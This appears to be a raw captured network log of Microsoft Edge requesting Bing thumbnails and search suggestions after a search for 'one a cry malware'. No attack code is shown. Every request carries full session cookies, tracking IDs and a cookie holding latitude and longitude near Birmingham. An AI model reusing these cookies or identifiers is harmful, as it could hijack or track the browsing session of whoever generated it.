accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-tFe9+vy4ZtWF9ZU7U/PCPkyA/rjwWnU8DiUPI4ttai8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:11 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b155
GET

https://www.bing.com/th?id=OSK.8bf19c3257c7f34b54304f07b55e46fa&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.8bf19c3257c7f34b54304f07b55e46fa&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2789
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b229
GET

https://www.bing.com/th?id=OSK.00247bdcf0be5e1db5b3c0f27d1660c8&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.00247bdcf0be5e1db5b3c0f27d1660c8&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3326
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b22a
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wa&cp=2&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=wa&cp=2&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2576
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b22b
GET

https://www.bing.com/th?id=OSK.BLxwfP0D4vjbCU8hjQh6txYu8K4eab8L7X9Jo3bFnms&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.BLxwfP0D4vjbCU8hjQh6txYu8K4eab8L7X9Jo3bFnms&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7907
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b22c
GET

https://www.bing.com/th?id=OSK.ldBO3rrsVcHbTE7YZTJEbBPL748n1HJF27yJg6cHPEc&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.ldBO3rrsVcHbTE7YZTJEbBPL748n1HJF27yJg6cHPEc&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3082
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b22d
GET

https://www.bing.com/th?id=OSK.3b02d14279f456ccaaadffe3115d5382&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.3b02d14279f456ccaaadffe3115d5382&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5293
date: Thu, 17 Oct 2024 21:04:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199051.1491b22f
GET

https://www.bing.com/th?id=OSK.1b0970f383a231cc6c32541220f07ef7&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.1b0970f383a231cc6c32541220f07ef7&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
